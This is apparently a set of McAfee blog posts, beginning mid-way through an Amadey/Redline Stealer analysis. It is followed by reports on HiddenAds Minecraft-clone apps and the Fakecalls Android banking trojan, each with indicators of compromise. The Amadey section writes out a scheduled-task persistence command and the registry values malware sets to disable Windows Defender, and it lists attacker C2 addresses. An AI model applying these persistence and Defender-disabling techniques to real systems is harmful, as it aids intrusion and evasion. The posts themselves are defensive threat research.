The file showed high file ratio of the resource section, with the entropy of 7.810. Entropy is a measure of the randomness or unpredictability of the data in the file. It is often used as an indicator of whether a file is likely to be malicious or not. 

In the case of a PE file, high entropy can indicate that the file contains a significant amount of compressed or encrypted data, or that it has been obfuscated or packed in a way that makes it more difficult to analyze. This can be a common technique used by malware authors to evade detection by antivirus software. 

 

Figure 7: File ratio and entropy of the resource section 

 

Like the previous file, cydn.exe also had two executables archived in its resource section, named aydx.exe and mika.exe. The “RUNPROGRAM” attribute commands to run aydx.exe and the “POSTRUNPROGRAM” attribute commands to execute mika.exe once aydx.exe is executed. These files are also dropped in TEMP folder. 

Figure 8: aydx.exe and mika.exe packed in resource section 

 

Figure 9: Executables dropped in another TEMP folder 

The order of file execution is as follows: First, Wextract.exe and cydn.exe, which have already been discussed, are followed by aydx.exe, and then by mika.exe and vona.exe. 

 

Figure 10: Execution flow 

Stage 3: Analysis of aydx.exe 

Aydx.exe is a 32-bit Portable Executable file, which is 405Kb and is compiled in C/C++. Once executed, it attempts to make a request to IP address: 193.233.20.7. 

Figure 11: Malware trying to connect to IPv4 

This IP address is linked with Redline Stealer connecting on port number 4138. 

Analysis of mika.exe 

Mika.exe is 32-bit Portable Executable, complied in .NET and is just 11 KB in size. The original name of the file is “Healer.exe”. This exe file makes no internet activity but does something in the target machine which assists malwares from further stages to carry out their execution.  

The intent of mika.exe is to turn off Windows Defender in all possible ways. Once mika.exe was executed, this is how the Defender settings of the system looked like: 

Figure 12: Real-time protection turned off 

This setting was irreversible and couldn’t be turned back to on via settings of Windows. Following this, logs from Procmon were analyzed and there were entries regarding Windows defender, such as: 

Figure 13: Procmon logs 

To validate this, Registry was analysed and all the changes were found there. The changes in Registry were found to be in exact order as of Procmon logs. In Windows, the registry is a hierarchical database that stores configuration settings and options for the operating system, as well as for applications and devices. It is used to store information about the hardware, software, user preferences, and system settings on a Windows computer. Following keys are added under Real-Time Protection: 

  • DisableBehaviourMonitoring 
  • DisableIOAVProtection 
  • DisableOnAccessProtection 
  • DisableRealtimeMonitoring 
  • DisableScanOnRealitimeEnable 

Figure 14: Keys added in Registry 

By doing so malware is restricting all the normal users from turning the Windows Defender on. When attackers disable Windows Defender through the registry, the change is likely to persist even if the user or administrator tries to re-enable it through the Windows Defender settings. This allows the attacker to maintain control over the system for a longer period. This supports malwares of further stages to easily execute themselves without any hinderances. This can be leveraged by all the malwares, regardless of their correspondence to this very campaign. 

Stage 4: Analysis of vona.exe 

Vona.exe, a variant of the Amadey malware family, is compiled in C/C++ and is 236 KB in size. This is the last file to be executed from the current cluster.  When executed, a highly extensive process tree quickly appeared. 

Figure 15: Process tree of vona.exe 

 

Stage 5: Analysis of mnolyk.exe 

An immediate child process of vona.exe is mnolyk.exe, another Amadey component, is dropped in a folder in TEMP folder. 

 

Figure 16: mnolyk.exe dropped in TEMP folder 

Mnolyk.exe makes active connections to IP addresses 62.204.41.5 and 62.204.41.251 

Malicious DLLs are downloaded from 62.204.41.5, which are executed later in the campaign. The target was made to search for two different DLLs, namely cred.dll and clip.dll. 

Figure 17: Malicious dlls downloaded 

 

From 62.204.41.251, various exe files are downloaded to the TEMP folder, and later executed. Exes downloaded are: 

fuka.exe 

Figure 18: fuka.exe 

 

nikas.exe 

Figure 19: nikas.exe 

igla.exe 

Figure 20: igla.exe 

nocr.exe

Figure 21: nocr.exe 

lebro.exe

Figure 22: lebro.exe 

 

Following the execution of mnolyk.exe, a series of schtasks.exe and cacls.exe were executed. 

The command line for schtasks.exe is “C:\Windows\System32\schtasks.exe” /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR “C:\Users\test\AppData\Local\Temp\5eb6b96734\mnolyk.exe” /F 

  • “/Create” – This is the command to create a new scheduled task. 
  • “/SC MINUTE” – This parameter sets the scheduling interval for the task to “MINUTE”. The task will run every minute. 
  • “/MO 1” – This parameter sets the repeat count to “1”. The task will run only once. 
  • “/TN” – This parameter specifies the name of the task. The name should be specified after the “/TN” parameter. 

So, the entire command line “schtasks.exe /Create /SC MINUTE /MO 1 /TN” would create a scheduled task that runs once every minute. The name of the task specified is the path to mnolyk.exe. 

 

There were several instances of cacls.exe created. One of them is explained here along with its parameter. The command line is “CACLS  ”mnolyk.exe” /P “test:R” /E” 

  • “CACLS” – This is the command to change the ACL of a file. 
  • “mnolyk.exe” – This is the file for which the ACL will be modified. 
  • “/P test:R” – This parameter specifies the permission change for a user named “test”. The “:R” at the end indicates that the “test” user will be granted “Read” permission. 
  • “/E” – This parameter specifies that the ACL change will be made to the file’s effective ACL. The effective ACL is the actual set of permissions that are applied to the file. 

So, the entire command line “CACLS mnolyk.exe /P test:R /E” would grant the “test” user or group “Read” permission to the “mnolyk.exe” file. Hence the user “test” can neither write nor delete this file. If in place of “/P test:R”, “/P test:N” was mentioned, which is mentioned in one of the command line, it would give “None” permission to the user. 

 

Stage 6: Analyzing fuka.exe, nikas.exe, igla.exe, nocr.exe and lebro.exe 

Fuka.exe 

Fukka.exe, a variant of the Redline Stealer malware family, is 175 KB and is compiled in .NET. The original name of the file is Samarium.exe. It shows some network activity with IP 193.233.20.11. 

Figure 23: Network activity of fuka.exe 

Nikas.exe 

Nikas.exe is 248 KB executable file compiled in C/C++. It disables automatic updates for Windows and checks the status of all the sub-fields of Real-Time Protection that were previously changed by mika.exe. No network activity was found during replication. 

Igla.exe 

Igla.exe is 520 KB file, compiled in C/C++. The original name of the file is WEXTRACT.EXE.MUI. Like we saw in cydn.exe, this PE has also two more exes packed in its resource section, bvPf.exe and cmkmka.exe. Once igla.exe is executed, bvPf.exe is executed, followed by cmkmka.exe. 

Figure 24: RUNPROGRAM attribute in igla.exe 

 

Figure 25: POSTRUNPROGRAM attribute in igla.exe 

 

bvPf.exe 

bvPf.exe is 306 KB in size and is compiled in C/C++.  The original filename is nightskywalker.exe. The file is dropped in a folder in TEMP folder of the system. 

The exe has tried connecting to 193.233.20.11, but server did not respond, and no communication took place. 

cmkmka.exe 

cmkmka.exe is 32-bit PE file, 283.5 KB in size. It further launches AppLaunch.exe which communicates to C2. 

It communicates to the IP address: 176.113.115.17 which is an active C2 for Redline Stealer and connects to the port 4132. 

 

Figure 26: Data exfiltration 

 

The blue-colored content in the data indicates the information being transmitted from the Command and Control (C2) server, which is providing instructions to the malware regarding the specific data that needs to be retrieved along with their corresponding paths. These paths include user profiles of different web browsers, various crypto wallet paths, and other related data. 

As a response, all the data residing at the specified paths is sent back to the C2 server of the malware. This includes all the profiles of different web browsers, information related to crypto wallets, and even user-related data from the Windows operating system. This process allows the C2 server to collect a vast amount of sensitive information from the infected system, which could be exploited by the attackers for malicious purposes. 

Nocr.exe 

Nocr.exe, a component of Redline Stealer, is a 175 KB .NET binary. The original name of the file is Alary.exe.  It communicates to the IP address 176.113.115.17. 

Lebro.exe 

Lebro.exe, a component of Amadey, is a 235 KB file, compiled in C/C++. Lebro.exe is responsible for executing nbveek.exe, which is a next stage of the malware. The file is again dropped in TEMP folder. 

Figure 27: Dropping another executable in TEMP folder 

Stage 7: Analyzing nbveek.exe 

The hashes of lebro.exe and nbveek.exe are same, they are the same binaries, hence it is Amadey. It is connecting to IP 62.204.41.88.  

 

Figure 28: Network activity of nbveek.exe 

 

The target system executes a php file, and the content of file includes the command to download another exe called setupff.exe. This exe is downloaded to the TEMP folder. 

Before setupff.exe is executed, again the series of schtasks.exe and cacls.exe are executed which were seen previously also. The same parameters were passed for nbveek.exe as they were for mnolyk.exe. 

Setupff.exe 

Setupff.exe is compiled in C/C++ and is 795 KB.  The file could not execute and threw Windows error. 

Stage 8: Final stage 

Later, another instance of setupff.exe was created which further invokes multiple instances of rundll32.exe. Here, the two dlls downloaded by mnolyk.exe, clip64.dll and cred64.dll, are executed through rundll32.exe. McAfee Labs detects these dlls to be Amadey maware. 

The network activity shows the dll to be connecting to 62.204.41.88. This dll again starts exfiltrating data to C2: 

 

Figure 29:Data exfiltration 

 

To conclude, the threat posed by the multi-stage attack that drops the Amadey botnet, and subsequently Redline Stealer, is significant and requires constant vigilance from both consumers and security professionals. By using the Amadey botnet as a delivery mechanism for other malware, attackers can leverage these same capabilities to evade detection and maintain persistence on infected computers. They can use Amadey to drop a wide range of malware, such as spyware, ransomware, and trojans, which can be used for a variety of malicious purposes, such as stealing sensitive information, encrypting files for ransom, or taking control of a computer for use in a larger botnet. Our analysis of various samples of this attack has revealed that the Amadey botnet distributes malware from multiple families and is not restricted to Redline Stealer alone. 

At McAfee, we are committed to providing our customers with robust and effective antivirus and anti-malware solutions that can detect and protect against threats like the Amadey botnet and other malware families. Our security software uses a combination of signature, machine learning, threat intelligence and behavioral-based detection techniques to identify and stop threats before they can cause damage. 

 

Indicators of Compromise (IOCs): 

File Type  SHA-256  Product  Detection 
.exe  80fed7cd4c7d7cb0c05fe128ced6ab2b9b3d7f03edcf5ef532c8236f00ee7376  Total Protection and LiveSafe  Downloader-FCND
Lockbit-FSWW
PWS-FDON 
.exe  d8e9b2d3afd0eab91f94e1a1a1a0a97aa2974225f4f086a66e76dbf4b705a800  Total Protection and LiveSafe  PWS-FDON
Lockbit-FSWW 
.exe  1d51e0964268b35afb43320513ad9837ec6b1c0bd0e56065ead5d99b385967b5  Total Protection and LiveSafe  Lockbit-FSWW 
.exe  850cd190aaeebcf1505674d97f51756f325e650320eaf76785d954223a9bee38  Total Protection and LiveSafe  PWS-FDON 
.exe  6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116  Total Protection and LiveSafe  Downloader-FCND 
.exe  6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116  Total Protection and LiveSafe  Downloader-FCND 
.exe  8020580744f6861a611e99ba17e92751499e4b0f013d66a103fb38c5f256bbb2  Total Protection and LiveSafe  AgentTesla-FCYU 
.exe  021ae2fadbc8bc4e83013de03902e6e97c2815ab821adaa58037e562a6b2357b  Total Protection and LiveSafe  Lockbit-FSWW 
.exe  aab1460440bee10e2efec9b5c83ea20ed85e7a17d4ed3b4a19341148255d54b1  Total Protection and LiveSafe  Lockbit-FSWW 
.exe  54ce28a037eea87448e65bc25f8d3a38ddd4b4679516cc59899b77150aa46fcc  Total Protection and LiveSafe  GenericRXVK-HF 
.exe  0cca99711baf600eb030bbfcf279faf74c564084e733df3d9e98bea3e4e2f45f  Total Protection and LiveSafe  AgentTesla-FCYU 
.exe  ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b  Total Protection and LiveSafe  Downloader-FCND 
.exe  ad1d5475d737c09e3c48f7996cd407c992c1bb5601bcc6c6287eb80cde3d852b  Total Protection and LiveSafe  Downloader-FCND 
.exe  d40d2bfa9fcbf980f76ce224ab6037ebd2b081cb518fa65b8e208f84bc155e41  Total Protection and LiveSafe  GenericRXVJ-QP 
.dll  cdd4072239d8a62bf134e9884ef2829d831efaf3f6f7f71b7266af29df145dd0  Total Protection and LiveSafe  PWS-FDOE 
.dll  10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8  Total Protection and LiveSafe  Trojan-FUUW 
.dll  3492ed949b0d1cbd720eae940d122d6a791df098506c24517da0cc149089f405  Total Protection and LiveSafe  Trojan-FUUW 
IPv4  193.233.20.7     
IPv4  62.204.41.5     
IPv4  62.204.41.251     
IPv4  193.233.20.11     
IPv4  176.113.115.17     
IPv4  62.204.41.88     

 

The post Deconstructing Amadey’s Latest Multi-Stage Attack and Malware Distribution appeared first on McAfee Blog.

HiddenAds Spread via Android Gaming Apps on Google Play

27 April 2023 at 00:13

Authored by Dexter Shin 

Minecraft is a popular video game that can be played on a desktop or mobile. This is a sandbox game developed by Mojang Studios. Players create and break apart various kinds of blocks in 3-dimensional worlds and they can select to enjoy Survivor Mode to survive in the wild or Creative Mode to focus on being creative. 

Minecraft’s popularity has led to many attempts to recreate similar games. As a result, there are so many games with the same concept as Minecraft worldwide. Even on Google Play, we can easily search for similar games. McAfee Mobile Research Team recently discovered 38 games with hidden advertising. These HiddenAds applications discovered on the Google Play Store and installed by at least 35 million users worldwide, have been found to send packets stealthily for advertising revenue in bulk.  

McAfee, a member of the App Defense Alliance, focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. reported the discovered apps to Google, which took prompt action and the apps are no longer available on Google Play. Android users are protected by Google Play Protect, which can warn users of identified malicious apps on Android devices, and McAfee Mobile Security detects this threat as Android/HiddenAds.BJL. For more information, and to get fully protected, visit McAfee Mobile Security. 

How is it distributed to users? 

They were officially uploaded to Google Play under various titles and package names. Many games have already been downloaded by users, including apps with 10M+ downloads. 

Figure 1. 10M+ downloaded app being one of them 

Also, because they can play the game, users can’t notice the large amount of advertising packets being generated on their devices. 

Figure 2. Game screen that can be played 

What does it do?

After the game is running, the user can play without any problems in the block-based world, only like Minecraft-type games. However, advertisement packets of various domains continuously occur on the device. For example, the four packets shown in the picture are questionable packets generated by the ads libraries of Unity, Supersonic, Google, and AppLovin. Unfortunately, nothing is displayed on the game screen. 

Figure 3. Continuous advertising packets 

What’s even more interesting is the initial network packets of these games. The structure of the initial packet is very similar. All domains are different. But using 3.txt as the path is equivalent. That is, packets in the form of https://(random).netlify.app/3.txt commonly occur first. The picture below is an example of the first packet extracted from three different apps. 

Figure 4. Similarity of the initial packet form 

Users affected worldwide 

This threat has been detected in various countries around the world. Indicated by our telemetry, the threat has been most prominently detected in the United States, Canada, South Korea, and Brazil.

 

Figure 5. Users around the world who are widely affected 

 

As we featured in the McAfee 2023 Consumer Mobile Threat Report, one of the most accessible content for young people using mobile devices is games. Malware authors are also aware of this and try to hide their malicious features inside games. Not only is it difficult for general users to find these hidden features, but they can easily trust games from official stores such as Google Play. 

 

We first recommend that users thoroughly review user reviews before downloading applications from the store. And users should install security software on their devices and always keep up to date. 

 

Indicators of Compromise 

 

Package Name  Application Name  SHA256  GooglePlay 

Downloads 

com.good.robo.game.builder.craft.block  Block Box Master Diamond  300343e701afddbf32bca62916fd717f2af6e8a98fd78cc50d11f1154971d857  10M+ 
com.craft.world.fairy.fun.everyday.block  Craft Sword Mini Fun  72fa914ad3460f9e696ca2264fc899cad20b06b640a7adf8cfe87dd0ea19e137  5M+ 
com.skyland.pet.realm.block.rain.craft  Block Box Skyland Sword  d15713467be2f60b2bc548ddb24f202eb64f2aed3fb8801daec14e708f5cee5b  5M+ 
com.skyland.fun.block.game.monster.craft  Craft Monster Crazy Sword  cadbc904e77feaaf4294d218808f43d50809a87202292e78b0e6a3e164de6851  5M+ 
com.monster.craft.block.fun.robo.fairy  Block Pro Forrest Diamond  08429992bef8259e3011af36ad9d3c2a61b8df384860fd2a007a32a1e4d634af  1M+ 
com.cliffs.realm.block.craft.rain.vip  Block Game Skyland Forrest  34ef407f2bedfd8485f6a178f14ee023d395cb9b76ff1754e8733c1fc9ce01fb  1M+ 
com.block.builder.build.clever.craft.boy  Block Rainbow Sword Dragon  23aa3cc9481591b524a442fa8df485226e21da9d960dc5792af4ae2a096593d5  1M+ 
com.fun.skyland.craft.block.monster.loki  Craft Rainbow Mini Builder  88fa7de264c5880e65b926df4f75ac6a2900e3718d9d3576207614e20f674068  1M+ 
com.skyland.craft.caves.game.monster.block  Block Forrest Tree Crazy  010c081e5fda58d6508980528efb4f75e572d564ca9b5273db58193c59987abf  1M+ 
com.box.block.craft.builder.cliffs.build  Craft Clever Monster Castle  11c5e2124e47380d5a4033c08b2a137612a838bc46f720fba2a8fe75d0cf4224  500K+ 
com.block.sun.game.box.build.craft  Block Monster Diamond Dragon  19ad0dc40772d29f7f39b3a185abe50d0917cacf5f7bdc577839b541f61f7ac0  500K+ 
com.builder.craft.diamond.block.clever.robo  Craft World Fun Robo  746e2f552fda2e2e9966fecf6735ebd5a104296cde7208754e9b80236d13e853  500K+ 
com.block.master.boy.craft.cliffs.diamond  Block Pixelart Tree Pro  25b22e14f0bb79fc6b9994faec984501d0a2bf5573835d411eb8a721a8c2e397  500K+ 
com.fun.block.everyday.boy.robo.craft  Craft Mini Lucky Fun  9fdddf4a77909fd1d302c8f39912a41483634db66d30f89f75b19739eb8471ff  500K+ 
com.builder.craft.block.sun.game.mini  Block Earth Skyland World  b9284db049c0b641a6b760e7716eb3561e1b6b1f11df8048e9736eb286c2beed  500K+ 
com.dragon.craft.world.pixelart.block.vip  Block Rainbow Monster Castle  d6984e08465f08e9e39a0cad8da4c1e405b3aa414608a6d0eaa5409e7ed8eac1  500K+ 
com.craft.vip.earth.everyday.block.game  Block Fun Rainbow Builder  f3077681623d9ce32dc6a9cbf5d6ab7041297bf2a07c02ee327c730e41927c5f  500K+ 
com.block.good.mini.craft.box.best  Craft Dragon Diamond Robo  e685fb5a426fe587c3302bbd249f8aa9e152c1de9b170133dfb492ed5552acc9  500K+ 
com.lucky.robo.craft.loki.block.good  Block World Tree Monster  06c3ba10604c38006fd34406edd47373074d57c237c880a19fb8d3f34572417d  100K+ 
com.caves.robo.craft.dragon.block.earth  Block Diamond Boy Pro  122406962c303eaeb9839d767835a82ae9d745988deeef4c554e1750a5106cf0  100K+ 
com.tree.world.city.block.craft.crazy  Block Lucky Master Earth  e69fe06cb77626be76f2c92ad4229f6eb04c06c73e153d5424386a1309adbd15  100K+ 
com.game.skyland.craft.monster.block.best  Craft Forrest Mini Fun  e5fc2e6e3749cb4787a8bc5387ebb7802a2d3f9b408e4d2d07ee800056bb3e16  100K+ 
com.everyday.vip.caves.house.block.craft  Craft Sword City Pro  318165fd8d77a63ca221f5d3ee163e6f2d6df1f2df5c169aca6aca23aef2cf25  100K+ 
com.cell.rain.block.craft.loki.fairy  Block Loki Monster Builder  4f22be2ce64376f046ca180bd9933edcd62fd36f4a7abc39edf194f7170e2534  100K+ 
com.block.good.sun.boy.craft.fun  Block Boy Earth Mini  3b0cf56fb5929d23415259b718af15118c44cf918324cc62c1134bf9bc0f2a00  100K+ 
com.fairy.builder.sun.skyland.craft.block  Block Crazy Builder City  537638903f31e32612bddc79a483cb2c7546966cca64c5becec91d6fc4835e22  100K+ 
com.monster.house.good.block.earth.craft  Craft Sword Vip Pixelart  5f85f020eb8afc768e56167a6d1b75b6d416ecb1ec335d4c1edb6de8f93a3cad  100K+ 
com.block.best.boy.craft.sword.cell  Block City Fun Diamond  698544a913cfa5df0b2bb5d818cc0394c653c9884502a84b9dec979f8850b1e7  100K+ 
com.crazy.clever.city.block.caves.craft  Craft City Loki Rainbow  ba50dc2d2aeef9220ab5ff8699827bf68bc06caeef1d24cb8d02d00025fcb41c  100K+ 
com.cliffs.builder.craft.block.lucky.earth  Craft Boy Clever Sun  77962047b32a44c472b89d9641d7783a3e72c156b60eaaec74df725ffdc4671b  100K+ 
com.lucky.best.block.game.diamond.craft  Block City Dragon Sun  ac3d0b79903b1e63b449b64276075b337b002bb9a9a9636a47fdd1fb7a0fe368  100K+ 
com.build.craft.boy.loki.master.block  Craft Loki Forrest Monster  a2db1eba73d911142134ee127897d5857c521135a8ee768ae172ae2d2ee7b1d4  100K+ 
com.build.lokicrafts.master.forest  Lokicraft: Forrest Survival 3D  0f53996f5e3ec593ed09e55baf1f93d32d891f7d7e58a9bf19594b235d3a8a84  50K+ 
com.sun.realm.craft.lucky.dragon.block  Craft Castle Sun Rain  1e74e73bc29ce1f55740e52250506447b431eb8a4c20dfc75fd118b05ca18674  50K+ 
com.block.craft.vip.sun.game.box  Craft Game Earth World  7483b6a493c0f4f6309e21cc553f112da191b882f96a87bce8d0f54328ac7525  50K+ 
com.rain.crazy.lucky.pro.block.craft  Craft Lucky Castle Builder  de5eb8284ed56e91e665d13be459b9a0708fa96549a57e81aa7c11388ebfa535  50K+ 
com.JavaKidz.attacksnake  Craftsman: Building City 2022  e19fcc55ec4729d52dc0f732da02dc5830a2f78ec2b1f37969ee3c7fe16ddb37  50K+ 
com.skyland.house.block.craft.crazy.vip  Craft Rainbow Pro Rain  a7675a08a0b960f042a02710def8dd445d9109ca9da795aed8e69a79e014b46f  50K+ 

 

The post HiddenAds Spread via Android Gaming Apps on Google Play appeared first on McAfee Blog.

Fakecalls Android Malware Abuses Legitimate Signing Key

21 April 2023 at 01:27

Authored by Dexter Shin 

McAfee Mobile Research Team found an Android banking trojan signed with a key used by legitimate apps in South Korea last year. By design, Android requires that all applications must be signed with a key, in other words a keystore, so they can be installed or updated. Because this key can only be used by the developer who created it, an application signed with the same key is assumed to belong to the same developer. That is the case of this Android banking trojan that uses this legitimate signing key to bypass signature-based detection techniques. And these banking trojans weren’t distributed on Google Play or official app stores until now. This threat had been disclosed to the company that owns the legitimate key last year and the company has taken precautions. The company has confirmed that they have replaced the signing key and currently, all their legitimate apps are signed with a new signing key. 

Android malware using a legitimate signing key 

While tracking the Android banking trojan Fakecalls we found a sample using the same signing key as a wellknown app in Korea. This app is developed by a reputable IT services company with extensive businesses across various sectors, including but not limited to IT, gaming, payment, and advertising. We confirmed that most of the malicious samples using this key pretend to be a banking app as they use the same icon as the real banking apps. 

Figure 1. Malware and legitimate app on Google Play 

Distribution method and latest status 

Domains verified last August when we first discovered the samples are now down. However, we investigated URLs related to this malware and we found similar ones related to this threat. Among them, we identified a phishing site that is still alive during our research. The site is also disguised as a banking site. 

Figure 2. A phishing page disguised as a Korean banking site 

We also found that they updated the domain information of this web page a few days before our investigation. 

So we took a deeper look into this domain and we found additional unusual IP addresses that led us to the Command and control(C2) server admin pages used by the cybercriminals to control the infected devices. 

 

Figure 3. Fakecalls Command and control(C2) admin pages 

How does it work 

When we check the APK file structure, we can see that this malware uses a packer to avoid analysis and detection. The malicious code is encrypted in one of the files below. 

Figure 4. Tencent’s Legu Packer libraries 

After decrypting the DEX file, we found some unusual functionality. The code below gets the Android package information from a file with a HTML extension. 

 Figure 5. Questionable code in the decrypted DEX file 

This file is in fact another APK (Android Application) rather than a traditional HTML file designed to be displayed in a web browser. 

Figure 6. APK file disguised as an HTML file 

When the user launches the malware, it immediately asks for permission to install another app. Then it tries to install an application stored in the assets directory as introduction.html”. Theintroduction.html” is an APK file and real malicious behavior happens here. 

Figure 7. Dropper asks you to install the main payload 

When the dropped payload is about to be installed, it asks for several permissions to access sensitive personal information. 

Figure 8. Permissions required by the main malicious application 

It also registers several services and receivers to control notifications from the device and to receive commands from a remote Command and Control server. 

 Figure 9. Services and receivers registered by the main payload

By contrast, the malware uses a legitimate push SDK to receive commands from a remote server. Here are the complete list of commands and their purpose. 

 

Command name  Purpose 
note  sms message upload 
incoming_transfer  caller number upload 
del_phone_record  delete call log 
zhuanyi  set call forwarding with parameter 
clear_note  delete sms message 
assign_zhuanyi  set call forwarding 
file  file upload 
lanjie  block sms message from specified numbers 
allfiles  find all possible files and upload them 
email_send  send email 
record_telephone  call recording on 
inout  re-mapping on C2 server 
blacklist  register as blacklist 
listener_num  no function 
no_listener_num  disable monitoring a specific number 
rebuild  reset and reconnect with C2 
deleteFile  delete file 
num_address_list  contacts upload 
addContact  add contacts 
all_address_list  call record upload 
deleteContact  delete contacts 
note_intercept  intercept sms message from specified numbers 
intercept_all_phone  intercept sms message from all 
clear_date  delete all file 
clear_phone_contact  delete all contacts 
clear_phone_record  delete all call log 
per_note  quick sms message upload 
soft_name  app name upload 

 

Cybercriminals are constantly evolving and using new ways to bypass security checks, such as abusing legitimate signing keys. Fortunately, there was no damage to users due to this signing key leak. However, we recommend that users install security software on their devices to respond to these threats. Also, users are recommended to download and use apps from the official app stores. 

McAfee Mobile Security detects this threat as Android/Banker regardless of the application, is signed with the previously legitimate signing key. 

 

Indicators of Compromise 

 

SHA256  Name  Type 
7f4670ae852ec26f890129a4a3d3e95c079f2f289e16f1aa089c86ea7077b3d8  신한신청서  Dropper 
9e7c9b04afe839d1b7d7959ad0092524fd4c6b67d1b6e5c2cb07bb67b8465eda  신한신청서  Dropper 
21ec124012faad074ee1881236c6cde7691e3932276af9d59259df707c68f9dc  신한신청서  Dropper 
9621d951c8115e1cc4cf7bd1838b8e659c7dea5d338a80e29ca52a8a58812579  신한신청서  Dropper 
60f5deb79791d2e8c2799e9af52adca5df66d1304310d1f185cec9163deb37a2  보안인증서  Banker 
756cffef2dc660a241ed0f52c07134b7ea7419402a89d700dffee4cc6e9d5bb6  보안인증서  Banker 
6634fdaa22db46a6f231c827106485b8572d066498fc0c39bf8e9beb22c028f6  보안인증서  Banker 
52021a13e2cd7bead4f338c8342cc933010478a18dfa4275bf999d2bc777dc6b  보안인증서  Banker 
125772aac026d7783b50a2a7e17e65b9256db5c8585324d34b2e066b13fc9e12  보안인증서  Banker 
a320c0815e09138541e9a03c030f30214c4ebaa9106b25d3a20177b5c0ef38b3  보안인증서  Banker 
c7f32890d6d8c3402601743655f4ac2f7390351046f6d454387c874f5c6fe31f  보안인증서  Banker 
dbc7a29f6e1e91780916be66c5bdaa609371b026d2a8f9a640563b4a47ceaf92  보안인증서  Banker 
e6c74ef62c0e267d1990d8b4d0a620a7d090bfb38545cc966b5ef5fc8731bc24  보안인증서  Banker 

 

Domains: 

  • http[://]o20-app.dark-app.net 
  • http[://]o20.orange-app.today 
  • http[://]orange20.orange-app.today 

The post Fakecalls Android Malware Abuses Legitimate Signing Key appeared first on McAfee Blog.

❌
❌